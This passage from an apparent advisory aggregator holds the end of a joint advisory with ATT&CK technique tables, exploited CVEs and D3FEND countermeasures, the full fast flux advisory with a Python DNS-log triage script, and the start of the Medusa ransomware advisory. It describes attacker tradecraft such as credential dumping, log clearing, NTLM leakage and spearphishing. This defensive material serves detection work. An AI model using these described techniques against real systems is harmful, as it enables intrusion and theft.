Reconnaissance TA0043 Conducted reconnaissance on at least one entity involved in the production of ICS components for railway management. Gather Victim Identity Information: Email Addresses T1589.002 Conducted contact information reconnaissance to identify additional targets in key positions. 
Gather Victim Org Information T1591 Conducted reconnaissance of the cybersecurity department. Gather Victim Org Information: Identify Roles T1591.004 Conducted reconnaissance of individuals responsible for coordinating transport. Gather Victim Org Information: Business Relationships T1591.002 Conducted reconnaissance of other companies cooperating with the victim entity. Gather Victim Host Information T1592 Attempted to enumerate Real Time Streaming Protocol (RTSP) servers hosting IP cameras. Table 3: Resource development Tactic/Technique Title ID Use Compromise Accounts: Email Accounts T1586.002 Sent phishing emails using compromised accounts. Compromise Accounts: Cloud Accounts T1586.003 Sent phishing emails using compromised accounts. Table 4: Initial Access Tactic/Technique Title ID Use Trusted Relationship T1199 Conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access. Phishing T1566 Used spearphishing for credentials and delivering malware to gain initial access to targeted entities. Phishing: Spearphishing Attachment T1566.001 Sent emails with malicious attachments. Phishing: Spearphishing Link T1566.002 Used spearphishing with included links to fake login pages. Sent emails with embedded hyperlinks that downloaded a malicious archive. Phishing: Spearphishing Voice T1566.004 Attempted to use voice phishing to gain access to privileged accounts by impersonating IT staff. External Remote Services T1133 Exploited Internet-facing infrastructure, including corporate VPNs, to gain initial access to targeted entities. Exploit Public-Facing Application T1190 Exploited public vulnerabilities and SQL injection to gain initial access to targeted entities. Content Injection T1659 Leveraged a WinRAR vulnerability allowing for the execution of arbitrary code embedded in an archive. 
Table 5: Execution Tactic/Technique Title ID Use User Execution: Malicious Link T1204.001 Used malicious links to hosted shortcuts in spearphishing. User Execution: Malicious File T1204.002 Delivered malware executables via spearphishing. Scheduled Task/Job: Scheduled Task T1053.005 Used scheduled tasks to establish persistence. Command and Scripting Interpreter T1059 Delivered scripts in spearphishing. Executed arbitrary shell commands. Command and Scripting Interpreter: PowerShell T1059.001 PowerShell commands were often used to prepare data for exfiltration. Command and Scripting Interpreter: Windows Command Shell T1059.003 Used BAT script in spearphishing. Command and Scripting Interpreter: Visual Basic T1059.005 Used VBScript in spearphishing. Command and Scripting Interpreter: Python T1059.006 Installed python on infected machines to enable the execution of Certipy. Table 6: Persistence Tactic/Technique Title ID Use Account Manipulation: Additional Email Delegate Permissions T1098.002 Used manipulation of mailbox permissions to establish sustained email collection. Modify Authentication Process: Multi-Factor Authentication T1556.006 Enrolled compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access. Hijack Execution Flow: DLL Search Order Hijacking T1574.001 Used DLL search order hijacking to facilitate malware execution. Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 Used run keys to establish persistence. Boot or Logon Autostart Execution: Shortcut Modification T1547.009 Placed malicious shortcuts in the startup folder to establish persistence. Table 7: Defense Evasion Tactic/Technique Title ID Use Indicator Removal: Clear Windows Event Logs T1070.001 Deleted event logs through the wevtutil utility. 
Table 8: Credential access Tactic/Technique Title ID Use Brute Force T1110 Sent requests with Base64-encoded credentials for the RTSP server, which included publicly documented default credentials, and likely were generic attempts to brute force access to the devices. Brute Force: Password Guessing T1110.001 Used credential guessing to gain initial access to targeted entities. Brute Force: Password Spraying T1110.003 Used brute force to gain initial access to targeted entities. Conducted a brute force password spray via LDAP. Multi-Factor Authentication Interception T1111 Used multi-stage redirectors to provide MFA relaying capabilities in some campaigns. Input Capture T1056 Used multi-stage redirectors to provide CAPTCHA relaying capabilities in some campaigns. Forced Authentication T1187 Used an Outlook NTLM vulnerability to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations. OS Credential Dumping: NTDS T1003.003 Attempted to dump Active Directory NTDS.dit domain databases. Unsecured Credentials: Group Policy Preferences T1552.006 Retrieved plaintext passwords via Group Policy Preferences using Get-GPPPassword.py. Table 9: Discovery Tactic/Technique Title ID Use Account Discovery: Domain Account T1087.002 Used a modified ldap-dump.py to enumerate the Windows environment. Table 10: Command and Control Tactic/Technique Title ID Use Hide Infrastructure T1665 Abused SOHO devices to facilitate covert cyber operations, as well as proxy malicious activity, via devices with geolocation in proximity to the target. Proxy: External Proxy T1090.002 Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers. Proxy: Multi-hop Proxy T1090.003 Used Tor and commercial VPNs as part of their anonymization infrastructure Encrypted Channel T1573 Connected to victim infrastructure using encrypted TLS. Multi-Stage Channels T1104 Used multi-stage redirectors for campaigns. 
Table 11: Defense evasion (mobile framework) Tactic/Technique Title ID Use Execution Guardrails T1627 Used multi-stage redirectors to verify browser fingerprints in some campaigns. Execution Guardrails: Geofencing T1627.001 Used multi-stage redirectors to verify IP-geolocation in some campaigns. Table 12: Lateral movement Tactic/Technique Title ID Use Lateral Movement TA0008 Used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment. Remote Services: Remote Desktop Protocol T1021.001 Moved laterally within the network using RDP. Table 13: Collection Tactic/Technique Title ID Use Email Collection T1114 Retrieved sensitive data from email servers. Email Collection: Remote Email Collection T1114.002 Used server data exchange protocols and APIs such as Exchange Web Services (EWS) and IMAP to exfiltrate data from email servers. Automated Collection T1119 Used periodic EWS queries to collect new emails. Video Capture T1125 Attempted to gain access to the cameras’ feeds. Archive Collected Data T1560 Accessed files were archived in .zip files prior to exfiltration. Archive Collected Data: Archive via Utility T1560.001 Prepared zip archives for upload to the actors’ infrastructure. Table 14: Exfiltration Tactic/Technique Title ID Use Exfiltration Over Alternative Protocol T1048 Attempted to exfiltrate archived data via a previously dropped OpenSSH binary. Scheduled Transfer T1029 Used periodic EWS queries to collect new emails sent and received since the last data exfiltration. Appendix B: CVEs exploited Table 15: Exploited CVE information CVE Vendor/Product Details CVE-2023-38831 RARLAB WinRAR Allows execution of arbitrary code when a user attempts to view a benign file within a ZIP archive. 
CVE-2023-23397 Microsoft Outlook External actors could send specially crafted emails that cause a connection from the victim to an untrusted location of the actor’s control, leaking the Net-NTLMv2 hash of the victim that the actor could then relay to another service to authenticate as the victim. CVE-2021-44026 Roundcube Webmail Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search params. CVE-2020-35730 Roundcube Webmail An XSS issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16 and 1.4.x before 1.4.10, where a plaintext email message with JavaScript in a link reference element is mishandled by linkref_addindex in rcube_string_replacer.php. CVE-2020-12641 Roundcube Webmail Roundcube Webmail before 1.4.4 allows arbitrary code execution via shell metacharacters in a configuration setting for im_convert_path or im_identify_path in rcube_image.php. Appendix C: MITRE D3FEND Countermeasures Table 16: MITRE D3FEND countermeasures Countermeasure Title ID Details Network Isolation D3-NI Employ appropriate network segmentation. Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers. Access Mediation D3-AMED Limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions. Configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access. Inbound Traffic Filtering D3-ITF Implement host firewall rules to block connections from other devices on the network, other than from authorized management devices and servers, to prevent lateral movement. Resource Access Pattern Analysis D3-RAPA Use automated tools to audit access logs for security concerns and identify anomalous access requests. Outbound Traffic Filtering D3-OTF Block NTLM/SMB requests to external infrastructure. 
Platform Monitoring D3-PM Install EDR/logging/cybersecurity solutions onto high value systems with large amounts of sensitive data such as mail servers and domain controllers. System File Analysis D3-SFA Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly. Application Hardening D3-AH Enable optional security features in Windows to harden endpoints and mitigate initial access techniques. Application-based Process Isolation D3-ABPI Enable attack surface reduction rules to prevent executable content from email. Executable Allowlisting D3-EAL Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA%. Execution Isolation D3-EI Unless users are involved in the development of scripts, limit the execution of scripts (such as batch, JavaScript, and PowerShell) to known scripts. Application Configuration Hardening D3-ACH Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode. Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication. Turn off other ports/services not in use (e.g., FTP, web interface, etc.). Process Spawn Analysis D3-PSA Use open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters. URL Reputation Analysis D3-URA Use services that provide enhanced browsing services and safe link checking. Network Access Mediation D3-NAM Do not allow incoming traffic, especially logins to systems, from public VPN services. Where possible, logins from public VPNs, including exit nodes in the same country as target systems, should be blocked or, if allowed, alerted on for further investigation. Ensure cameras and other Internet of Things devices are protected by a security appliance, if possible. 
DNS Denylisting D3-DNSDL Do not allow outgoing traffic to hosting and API mocking services frequently used by malicious actors. Domain Name Reputation Analysis D3-DNRA Heuristic detections for web requests to new subdomains may uncover malicious phishing activity. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims. Multi-factor Authentication D3-MFA Use MFA with strong factors and require regular re-authentication, especially for management accounts. Job Function Access Pattern Analysis D3-JFAPA Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts. User Account Permissions D3-UAP Separate privileged accounts by role and alert on misuse of privileged accounts. Audit user accounts on all devices to ensure they are an accurate reflection of your organization and that they are being used as expected. Token-based Authentication D3-TBA Reduce reliance on passwords; instead, consider using services like single sign-on. Credential Hardening D3-CH Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts. Authentication Event Threshholding D3-ANET Use account throttling or account lockout. Throttling progressively increases time delay between successive login attempts. If using account lockout, allow between 5 to 10 attempts before lockout. Strong Password Policy D3-SPP Use a service to check for compromised passwords before using them. Credential Rotation D3-CRO Change all default credentials. Encrypted Tunnels D3-ET Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols). Use a VPN for remote connections to devices. 
Software Update D3-SU Apply security patches and firmware updates to all devices. Ensure devices are currently supported. Replace devices that are end-of-life. Agent Authentication D3-AA Ensure authentication is enabled for remote access to devices. If supported on IP cameras, enable authenticated RTSP access only. User Behavior Analysis D3-UBA Review all authentication activity for remote access to make sure it is valid and expected. Investigate any unexpected or unusual activity.

Fast Flux: A National Security Threat
Governance & Regulation | US-CERT Alerts | 361 days ago

Executive summary

Many networks have a gap in their defenses for detecting and blocking a malicious technique known as “fast flux.” This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection. Malicious cyber actors, including cybercriminals and nation-state actors, use fast flux to obfuscate the locations of malicious servers by rapidly changing Domain Name System (DNS) records. Additionally, they can create resilient, highly available command and control (C2) infrastructure, concealing their subsequent malicious operations. This resilient and fast changing infrastructure makes tracking and blocking malicious activities that use fast flux more difficult.

The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), and New Zealand National Cyber Security Centre (NCSC-NZ) are releasing this joint cybersecurity advisory (CSA) to warn organizations, Internet service providers (ISPs), and cybersecurity service providers of the ongoing threat of fast flux enabled malicious activities as a defensive gap in many networks. This advisory is meant to encourage service providers, especially Protective DNS (PDNS) providers, to help mitigate this threat by taking proactive steps to develop accurate, reliable, and timely fast flux detection analytics and blocking capabilities for their customers. This CSA also provides guidance on detecting and mitigating elements of malicious fast flux by adopting a multi-layered approach that combines DNS analysis, network monitoring, and threat intelligence. The authoring agencies recommend all stakeholders, government and providers alike, collaborate to develop and implement scalable solutions to close this ongoing gap in network defenses against malicious fast flux activity.

Download the PDF version of this report: Fast Flux: A National Security Threat (PDF, 841 KB).

Technical details

When malicious cyber actors compromise devices and networks, the malware they use needs to “call home” to send status updates and receive further instructions. To decrease the risk of detection by network defenders, malicious cyber actors use dynamic resolution techniques, such as fast flux, so their communications are less likely to be detected as malicious and blocked. Fast flux refers to a domain-based technique that is characterized by rapidly changing the DNS records (e.g., IP addresses) associated with a single domain [T1568.001].

Single and double flux

Malicious cyber actors use two common variants of fast flux to perform operations:

1. Single flux: A single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. This setup ensures that if one IP address is blocked or taken down, the domain remains accessible through the other IP addresses. See Figure 1 as an example to illustrate this technique.

Figure 1: Single flux technique.

Note: This behavior can also be used for legitimate purposes for performance reasons in dynamic hosting environments, such as in content delivery networks and load balancers.

2. Double flux: In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. This provides an additional layer of redundancy and anonymity for malicious domains. Double flux techniques have been observed using both Name Server (NS) and Canonical Name (CNAME) DNS records. See Figure 2 as an example to illustrate this technique.

Figure 2: Double flux technique.
Both techniques leverage a large number of compromised hosts, usually as a botnet from across the Internet that acts as proxies or relay points, making it difficult for network defenders to identify the malicious traffic and block or perform legal enforcement takedowns of the malicious infrastructure.

Numerous malicious cyber actors have been reported using the fast flux technique to hide C2 channels and remain operational. Examples include:

- Bulletproof hosting (BPH) services offer Internet hosting that disregards or evades law enforcement requests and abuse notices. These providers host malicious content and activities while providing anonymity for malicious cyber actors. Some BPH companies also provide fast flux services, which help malicious cyber actors maintain connectivity and improve the reliability of their malicious infrastructure. [1] Refer to ASD’s ACSC’s “Bulletproof” hosting providers: Cracks in the armour of cybercriminal infrastructure for more information on BPH providers. [2]
- Fast flux has been used in Hive and Nefilim ransomware attacks. [3], [4]
- Gamaredon uses fast flux to limit the effectiveness of IP blocking. [5], [6], [7]

The key advantages of fast flux networks for malicious cyber actors include:

- Increased resilience. As a fast flux network rapidly rotates through botnet devices, it is difficult for law enforcement or abuse notifications to process the changes quickly and disrupt their services.
- Render IP blocking ineffective. The rapid turnover of IP addresses renders IP blocking irrelevant since each IP address is no longer in use by the time it is blocked. This allows criminals to maintain resilient operations.
- Anonymity. Investigators face challenges in tracing malicious content back to the source through fast flux networks. This is because malicious cyber actors’ C2 botnets are constantly changing the associated IP addresses throughout the investigation.

Additional malicious uses

Fast flux is not only used for maintaining C2 communications; it can also play a significant role in phishing campaigns to make social engineering websites harder to block or take down. Phishing is often the first step in a larger and more complex cyber compromise. Phishing is typically used to trick victims into revealing sensitive information (such as login passwords, credit card numbers, and personal data), but can also be used to distribute malware or exploit system vulnerabilities.

Similarly, fast flux is used for maintaining high availability for cybercriminal forums and marketplaces, making them resilient against law enforcement takedown efforts.

Some BPH providers promote fast flux as a service differentiator that increases the effectiveness of their clients’ malicious activities. For example, one BPH provider posted on a dark web forum that it protects clients from being added to Spamhaus blocklists by easily enabling the fast flux capability through the service management panel (see Figure 3). A customer just needs to add a "dummy server interface," which redirects incoming queries to the host server automatically. By doing so, only the dummy server interfaces are reported for abuse and added to the Spamhaus blocklist, while the servers of the BPH customers remain "clean" and unblocked.

Figure 3: Example dark web fast flux advertisement.

The BPH provider further explained that numerous malicious activities beyond C2, including botnet managers, fake shops, credential stealers, viruses, spam mailers, and others, could use fast flux to avoid identification and blocking. As another example, a BPH provider that offers fast flux as a service advertised that it automatically updates name servers to prevent the blocking of customer domains. Additionally, this provider further promoted its use of separate pools of IP addresses for each customer, offering globally dispersed domain registrations for increased reliability.
Detection techniques

The authoring agencies recommend that ISPs and cybersecurity service providers, especially PDNS providers, implement a multi-layered approach, in coordination with customers, using the following techniques to aid in detecting fast flux activity [CISA CPG 3.A]. However, quickly detecting malicious fast flux activity and differentiating it from legitimate activity remains an ongoing challenge to developing accurate, reliable, and timely fast flux detection analytics.

1. Leverage threat intelligence feeds and reputation services to identify known fast flux domains and associated IP addresses, such as in boundary firewalls, DNS resolvers, and/or SIEM solutions.
2. Implement anomaly detection systems for DNS query logs to identify domains exhibiting high entropy or IP diversity in DNS responses and frequent IP address rotations. Fast flux domains will frequently cycle through tens or hundreds of IP addresses per day.
3. Analyze the time-to-live (TTL) values in DNS records. Fast flux domains often have unusually low TTL values. A typical fast flux domain may change its IP address every 3 to 5 minutes.
4. Review DNS resolution for inconsistent geolocation. Malicious domains associated with fast flux typically generate high volumes of traffic with inconsistent IP-geolocation information.
5. Use flow data to identify large-scale communications with numerous different IP addresses over short periods.
6. Develop fast flux detection algorithms to identify anomalous traffic patterns that deviate from usual network DNS behavior.
7. Monitor for signs of phishing activities, such as suspicious emails, websites, or links, and correlate these with fast flux activity. Fast flux may be used to rapidly spread phishing campaigns and to keep phishing websites online despite blocking attempts.
8. Implement customer transparency and share information about detected fast flux activity, ensuring to alert customers promptly after confirmed presence of malicious activity.
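The following is an added example, not code from the authoring agencies, showing how detection techniques 2 and 3 above (IP diversity across answers and autonomous systems, plus unusually low TTLs) can be combined into a simple triage over resolver or passive-DNS log lines, how rotating NS records separate double flux from single flux, and how the CDN allowlisting caveat from the Mitigations section keeps legitimate load-balanced names from being flagged. It also emits BIND response-policy-zone (RPZ) records for flagged names, which is one way to implement the "non-routable DNS responses" and sinkholing described under mitigation 1. The log format, the thresholds, and the allowlisted name are assumptions for this demo; the sample log is constructed and uses documentation address ranges.

```python
"""Fast flux triage over resolver / passive-DNS log lines (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Heuristic thresholds (assumptions; tune against your own DNS baseline).
MIN_DISTINCT_IPS = 5      # distinct A answers seen for one name
MIN_DISTINCT_ASNS = 3     # answers spread across autonomous systems
MAX_TTL_SECONDS = 300     # advisory: flux domains rotate every 3 to 5 minutes
MIN_DISTINCT_NS = 3       # rotating NS records indicate double flux

# Hypothetical allowlist of known CDN / load-balanced names (the advisory's
# caveat: legitimate CDN behaviour can look like single flux).
CDN_ALLOWLIST = {"cdn-site.test"}

# Constructed log format: "<timestamp> <qname> <A|NS> <rdata> <ttl> [ASn]"
LINE_RE = re.compile(r"^(\S+) (\S+) (A|NS) (\S+) (\d+)(?: (AS\d+))?$")

@dataclass
class DomainStats:
    ips: set = field(default_factory=set)
    asns: set = field(default_factory=set)
    nameservers: set = field(default_factory=set)
    max_ttl: int = 0          # a flux domain keeps every TTL low
    answers: int = 0

def parse_line(line):
    """Return (ts, qname, rrtype, rdata, ttl, asn) or None if unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, qname, rrtype, rdata, ttl, asn = m.groups()
    return ts, qname.lower().rstrip("."), rrtype, rdata, int(ttl), asn

def aggregate(lines):
    """Collect per-domain IP, ASN, NS and TTL statistics from log lines."""
    stats = defaultdict(DomainStats)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue          # skip malformed lines instead of aborting
        _, qname, rrtype, rdata, ttl, asn = rec
        s = stats[qname]
        s.answers += 1
        s.max_ttl = max(s.max_ttl, ttl)
        if rrtype == "A":
            s.ips.add(rdata)
            if asn:
                s.asns.add(asn)
        else:
            s.nameservers.add(rdata.lower().rstrip("."))
    return stats

def classify(qname, s):
    """Label one domain: allowlisted, double-flux, single-flux or benign."""
    if qname in CDN_ALLOWLIST:
        return "allowlisted"
    low_ttl = s.max_ttl <= MAX_TTL_SECONDS
    single = (low_ttl and len(s.ips) >= MIN_DISTINCT_IPS
              and len(s.asns) >= MIN_DISTINCT_ASNS)
    if single and len(s.nameservers) >= MIN_DISTINCT_NS:
        return "double-flux"
    if single:
        return "single-flux"
    return "benign"

def triage(log_text):
    """Map each queried name to its classification."""
    stats = aggregate(log_text.splitlines())
    return {q: classify(q, s) for q, s in stats.items()}

def rpz_records(verdicts, sinkhole_ip=None):
    """Emit RPZ records for flagged names: 'CNAME .' answers NXDOMAIN,
    an A record steers traffic to a controlled sinkhole for analysis."""
    rows = []
    for name, verdict in sorted(verdicts.items()):
        if verdict.endswith("flux"):
            target = f"A {sinkhole_ip}" if sinkhole_ip else "CNAME ."
            rows.append(f"{name} {target}")
    return rows

# Constructed sample log (documentation ranges, .test names, private ASNs).
SAMPLE_LOG = """\
2025-04-01T10:00:00Z flux.test A 198.51.100.10 60 AS64500
2025-04-01T10:01:00Z flux.test A 198.51.100.11 60 AS64501
2025-04-01T10:02:00Z flux.test A 203.0.113.5 60 AS64502
2025-04-01T10:03:00Z flux.test A 203.0.113.77 60 AS64500
2025-04-01T10:04:00Z flux.test A 192.0.2.9 60 AS64501
2025-04-01T10:00:00Z dflux.test A 198.51.100.20 120 AS64510
2025-04-01T10:02:00Z dflux.test A 203.0.113.20 120 AS64511
2025-04-01T10:04:00Z dflux.test A 192.0.2.20 120 AS64512
2025-04-01T10:06:00Z dflux.test A 198.51.100.21 120 AS64513
2025-04-01T10:08:00Z dflux.test A 203.0.113.21 120 AS64510
2025-04-01T10:00:00Z dflux.test NS ns1.dflux.test 120
2025-04-01T10:03:00Z dflux.test NS ns2.dflux.test 120
2025-04-01T10:06:00Z dflux.test NS ns3.dflux.test 120
2025-04-01T10:00:00Z cdn-site.test A 198.51.100.30 60 AS64520
2025-04-01T10:01:00Z cdn-site.test A 198.51.100.31 60 AS64521
2025-04-01T10:00:00Z static.test A 192.0.2.100 3600 AS64530
2025-04-01T11:00:00Z static.test A 192.0.2.100 3600 AS64530
this line is not a DNS record and is skipped
"""

if __name__ == "__main__":
    verdicts = triage(SAMPLE_LOG)
    for name, verdict in sorted(verdicts.items()):
        print(f"{name:15} {verdict}")
    print("\n".join(rpz_records(verdicts, sinkhole_ip="192.0.2.1")))
```

On the constructed log, flux.test is labelled single-flux (five addresses in three ASNs, TTL 60), dflux.test is labelled double-flux because its NS set rotates as well, cdn-site.test is skipped by the allowlist even though its answers look flux-like, and static.test is benign. In production the thresholds should be derived from the network's own baseline, the allowlist should come from the expected CDN services named in the Mitigations section, and the RPZ output is only a starting point for the resolver policy, not a replacement for reputation data.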
Mitigations All organizations To defend against fast flux, government and critical infrastructure organizations should coordinate with their Internet service providers, cybersecurity service providers, and/or their Protective DNS services to implement the following mitigations utilizing accurate, reliable, and timely fast flux detection analytics. Note: Some legitimate activity, such as common content delivery network (CDN) behaviors, may look like malicious fast flux activity. Protective DNS services, service providers, and network defenders should make reasonable efforts, such as allowlisting expected CDN services, to avoid blocking or impeding legitimate content. 1. DNS and IP blocking and sinkholing of malicious fast flux domains and IP addresses Block access to domains identified as using fast flux through non-routable DNS responses or firewall rules. Consider sinkholing the malicious domains, redirecting traffic from those domains to a controlled server to capture and analyze the traffic, helping to identify compromised hosts within the network. Block IP addresses known to be associated with malicious fast flux networks. 2. Reputational filtering of fast flux enabled malicious activity Block traffic to and from domains or IP addresses with poor reputations, especially ones identified as participating in malicious fast flux activity. 3. Enhanced monitoring and logging Increase logging and monitoring of DNS traffic and network communications to identify new or ongoing fast flux activities. Implement automated alerting mechanisms to respond swiftly to detected fast flux patterns. Refer to ASD’s ACSC joint publication, Best practices for event logging and threat detection, for further logging recommendations. 4. Collaborative defense and information sharing Share detected fast flux indicators (e.g., domains, IP addresses) with trusted partners and threat intelligence communities to enhance collective defense efforts. 
Examples of indicator sharing initiatives include CISA’s Automated Indicator Sharing or sector-based Information Sharing and Analysis Centers (ISACs) and ASD’s Cyber Threat Intelligence Sharing Platform (CTIS) in Australia. Participate in public and private information-sharing programs to stay informed about emerging fast flux tactics, techniques, and procedures (TTPs). Regular collaboration is particularly important because most malicious activity by these domains occurs within just a few days of their initial use; therefore, early discovery and information sharing by the cybersecurity community is crucial to minimizing such malicious activity. [8] 5. Phishing awareness and training Implement employee awareness and training programs to help personnel identify and respond appropriately to phishing attempts. Develop policies and procedures to manage and contain phishing incidents, particularly those facilitated by fast flux networks. For more information on mitigating phishing, see joint Phishing Guidance: Stopping the Attack Cycle at Phase One. Network defenders The authoring agencies encourage organizations to use cybersecurity and PDNS services that detect and block fast flux. By leveraging providers that detect fast flux and implement capabilities for DNS and IP blocking, sinkholing, reputational filtering, enhanced monitoring, logging, and collaborative defense of malicious fast flux domains and IP addresses, organizations can mitigate many risks associated with fast flux and maintain a more secure environment. However, some PDNS providers may not detect and block malicious fast flux activities. Organizations should not assume that their PDNS providers block malicious fast flux activity automatically and should contact their PDNS providers to validate coverage of this specific cyber threat. For more information on PDNS services, see the 2021 joint cybersecurity information sheet from NSA and CISA about Selecting a Protective DNS Service. 
[9] In addition, NSA offers no-cost cybersecurity services to Defense Industrial Base (DIB) companies, including a PDNS service. For more information, see NSA’s DIB Cybersecurity Services and factsheet. CISA also offers a Protective DNS service for federal civilian executive branch (FCEB) agencies. See CISA’s Protective Domain Name System Resolver page and factsheet for more information. Conclusion Fast flux represents a persistent threat to network security, leveraging rapidly changing infrastructure to obfuscate malicious activity. By implementing robust detection and mitigation strategies, organizations can significantly reduce their risk of compromise by fast flux-enabled threats. The authoring agencies strongly recommend organizations engage their cybersecurity providers on developing a multi-layered approach to detect and mitigate malicious fast flux operations. Utilizing services that detect and block fast flux enabled malicious cyber activity can significantly bolster an organization's cyber defenses. Works cited [1] Intel471. Bulletproof Hosting: A Critical Cybercriminal Service. 2024. https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service [2] Australian Signals Directorate’s Australian Cyber Security Centre. "Bulletproof" hosting providers: Cracks in the armour of cybercriminal infrastructure. 2025. https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers [3] Logpoint. A Comprehensive guide to Detect Ransomware. 2023. https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf [4] Trendmicro. Modern Ransomware’s Double Extortion Tactic’s and How to Protect Enterprises Against Them. 2021. https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them [5] Unit 42. 
Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. 2022. https://unit42.paloaltonetworks.com/trident-ursa/ [6] Recorded Future. BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure. 2024. https://www.recordedfuture.com/research/bluealpha-abuses-cloudflare-tunneling-service [7] Silent Push. 'From Russia with a 71': Uncovering Gamaredon's fast flux infrastructure. New apex domains and ASN/IP diversity patterns discovered. 2023. https://www.silentpush.com/blog/from-russia-with-a-71/ [8] DNS Filter. Security Categories You Should be Blocking (But Probably Aren’t). 2023. https://www.dnsfilter.com/blog/security-categories-you-should-be-blocking-but-probably-arent [9] National Security Agency. Selecting a Protective DNS Service. 2021. https://media.defense.gov/2025/Mar/24/2003675043/-1/-1/0/CSI-SELECTING-A-PROTECTIVE-DNS-SERVICE-V1.3.PDF Disclaimer of endorsement The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. Purpose This document was developed in furtherance of the authoring cybersecurity agencies’ missions, including their responsibilities to identify and disseminate threats, and develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. 
Contact
National Security Agency (NSA): Cybersecurity Report Feedback: CybersecurityReports@nsa.gov. Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov. Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, MediaRelations@nsa.gov.
Cybersecurity and Infrastructure Security Agency (CISA): All organizations should report incidents and anomalous activity to CISA via the agency’s Incident Reporting System, its 24/7 Operations Center at report@cisa.gov, or by calling 1-844-Say-CISA (1-844-729-2472). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
Federal Bureau of Investigation (FBI): To report suspicious or criminal activity related to information found in this advisory, contact your local FBI field office or the FBI’s Internet Crime Complaint Center (IC3). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC): For inquiries, visit ASD’s website at www.cyber.gov.au or call the Australian Cyber Security Hotline at 1300 CYBER1 (1300 292 371).
Canadian Centre for Cyber Security (CCCS): CCCS supports Canadian organizations. Visit www.cyber.gc.ca for publications and guidance or contact CCCS via 1-833-CYBER-88 or email contact@cyber.gc.ca.
New Zealand National Cyber Security Centre (NCSC-NZ): The NCSC-NZ assists New Zealand organizations. Visit www.ncsc.govt.nz for guidance and resources, or email NCSC-NZ at info@ncsc.govt.nz.

#StopRansomware: Medusa Ransomware
Governance & Regulation | US-CERT Alerts | 382 days ago

Summary
Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025. Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation. FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.

Download the PDF version of this report: AA25-071A #StopRansomware: Medusa Ransomware (PDF, 672.45 KB)
For a downloadable list of IOCs, see: AA25-071A STIX XML (XML, 34.30 KB), AA25-071A STIX JSON (JSON, 42.28 KB)

Technical Details
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16.
